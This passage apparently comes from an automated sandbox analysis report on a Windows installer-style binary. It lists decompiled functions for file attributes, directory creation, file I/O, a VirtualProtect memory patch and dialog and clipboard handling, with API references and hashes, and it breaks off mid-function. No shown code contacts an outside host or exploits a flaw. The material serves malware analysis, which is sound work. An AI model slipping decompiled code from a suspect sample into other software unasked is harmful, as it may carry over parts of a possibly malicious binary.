                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                    • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                    • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                    • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                    0x00405dc6
                                                                    0x00405dcc
                                                                    0x00405dd1
                                                                    0x00405dda
                                                                    0x00405dda
                                                                    0x00405de3

                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                    • Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
                                                                    • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                    • Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                    0x004058bd
                                                                    0x004058c5
                                                                    0x00000000
                                                                    0x004058cb
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                    • Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
                                                                    • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                    • Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                    0x00405e62
                                                                    0x00405e72
                                                                    0x00405e7a
                                                                    0x00000000
                                                                    0x00405e81
                                                                    0x00000000
                                                                    0x00405e83

                                                                    APIs
                                                                    • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                    • Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
                                                                    • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                    • Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                    0x00405e91
                                                                    0x00405ea1
                                                                    0x00405ea9
                                                                    0x00000000
                                                                    0x00405eb0
                                                                    0x00000000
                                                                    0x00405eb2

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,00415F91,00415460,004033BF,00415460,00415F91,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                    • Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                    • Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 73582921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73584038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7358404c, 4, 0x40, 0x7358403c); // executed
					 *0x7358404c = 0xc2;
					 *0x7358403c = 0;
					 *0x73584044 = 0;
					 *0x73584058 = 0;
					 *0x73584048 = 0;
					 *0x73584040 = 0;
					 *0x73584050 = 0;
					 *0x7358404e = 0;
				}
				return 1;
			}



                                                                    0x7358292a
                                                                    0x7358292f
                                                                    0x7358293f
                                                                    0x73582947
                                                                    0x7358294e
                                                                    0x73582953
                                                                    0x73582958
                                                                    0x7358295d
                                                                    0x73582962
                                                                    0x73582967
                                                                    0x7358296c
                                                                    0x7358296c
                                                                    0x73582974

                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(7358404C,00000004,00000040,7358403C), ref: 7358293F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242471104.0000000073581000.00000020.00020000.sdmp, Offset: 73580000, based on PE: true
                                                                    • Associated: 00000000.00000002.242447030.0000000073580000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242513496.0000000073583000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242533114.0000000073585000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: ea15bf67adec07648e1df4e5ed83375f34e3c50eb3216ef5b31dd68afe4b6c08
                                                                    • Instruction ID: bd85287350280223e1bd076615075a1ce35078537fa92eadc241311bb7d9ef01
                                                                    • Opcode Fuzzy Hash: ea15bf67adec07648e1df4e5ed83375f34e3c50eb3216ef5b31dd68afe4b6c08
                                                                    • Instruction Fuzzy Hash: 5DF022F35082A0DEC360EF6A9444F873EE0A719359B22656AE99CDF241E37440469B12
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                    0x0040344c
                                                                    0x00403452

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                    0x004054b8
                                                                    0x004054c0
                                                                    0x004054c3
                                                                    0x004054cb
                                                                    0x004054ce
                                                                    0x0040565d
                                                                    0x00405663
                                                                    0x00405687
                                                                    0x00405687
                                                                    0x00405693
                                                                    0x00405699
                                                                    0x004056bb
                                                                    0x004056bb
                                                                    0x004056c1
                                                                    0x00405716
                                                                    0x00405716
                                                                    0x00405719
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040571b
                                                                    0x0040571e
                                                                    0x00405721
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040572b
                                                                    0x00405731
                                                                    0x00405733
                                                                    0x00405736
                                                                    0x00405833
                                                                    0x00000000
                                                                    0x00405833
                                                                    0x00405745
                                                                    0x00405751
                                                                    0x0040575a
                                                                    0x00405761
                                                                    0x00405765
                                                                    0x00405768
                                                                    0x00405771
                                                                    0x00405777
                                                                    0x0040577a
                                                                    0x0040577a
                                                                    0x0040578a
                                                                    0x00405790
                                                                    0x00405793
                                                                    0x0040579e
                                                                    0x0040579e
                                                                    0x0040579f
                                                                    0x004057a2
                                                                    0x004057a9
                                                                    0x004057b0
                                                                    0x004057b8
                                                                    0x004057b8
                                                                    0x004057c6
                                                                    0x004057cc
                                                                    0x004057cf
                                                                    0x004057cf
                                                                    0x004057d6
                                                                    0x004057dc
                                                                    0x004057e5
                                                                    0x004057ec
                                                                    0x004057f5
                                                                    0x004057f7
                                                                    0x004057fa
                                                                    0x00405809
                                                                    0x0040580b
                                                                    0x0040580e
                                                                    0x0040580f
                                                                    0x00405812
                                                                    0x00405813
                                                                    0x00405814
                                                                    0x00405814
                                                                    0x0040581c
                                                                    0x00405827
                                                                    0x0040582d
                                                                    0x0040582d
                                                                    0x00000000
                                                                    0x00405793
                                                                    0x004056c3
                                                                    0x004056c9
                                                                    0x004056f7
                                                                    0x004056f9
                                                                    0x004056ff
                                                                    0x0040570a
                                                                    0x0040570a
                                                                    0x00405711
                                                                    0x00000000
                                                                    0x00405711
                                                                    0x004056cd
                                                                    0x004056d7
                                                                    0x00000000
                                                                    0x0040569b
                                                                    0x0040569b
                                                                    0x004056a1
                                                                    0x004056dc
                                                                    0x00000000
                                                                    0x004056e3
                                                                    0x004056aa
                                                                    0x004056b1
                                                                    0x004056b6
                                                                    0x00000000
                                                                    0x004056b6
                                                                    0x00405699
                                                                    0x004054d4
                                                                    0x004054d8
                                                                    0x004054e0
                                                                    0x004054e4
                                                                    0x004054e7
                                                                    0x004054ea
                                                                    0x004054ed
                                                                    0x004054f0
                                                                    0x004054f1
                                                                    0x004054f2
                                                                    0x0040550b
                                                                    0x0040550e
                                                                    0x00405518
                                                                    0x00405527
                                                                    0x0040552f
                                                                    0x00405537
                                                                    0x0040553c
                                                                    0x0040553f
                                                                    0x0040554b
                                                                    0x00405554
                                                                    0x0040555d
                                                                    0x0040557f
                                                                    0x00405585
                                                                    0x00405596
                                                                    0x0040559b
                                                                    0x004055a9
                                                                    0x004055b7
                                                                    0x004055b7
                                                                    0x004055bc
                                                                    0x004055ca
                                                                    0x004055ca
                                                                    0x004055cf
                                                                    0x004055d2
                                                                    0x004055d7
                                                                    0x004055e3
                                                                    0x004055ec
                                                                    0x004055f9
                                                                    0x00405608
                                                                    0x004055fb
                                                                    0x00405600
                                                                    0x00405600
                                                                    0x00405614
                                                                    0x00405614
                                                                    0x00405628
                                                                    0x00405631
                                                                    0x0040563a
                                                                    0x0040564a
                                                                    0x00405656
                                                                    0x00405656
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID:
                                                                    • API String ID: 590372296-0
                                                                    • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                    • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                                    • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                    • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x53b4aa
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
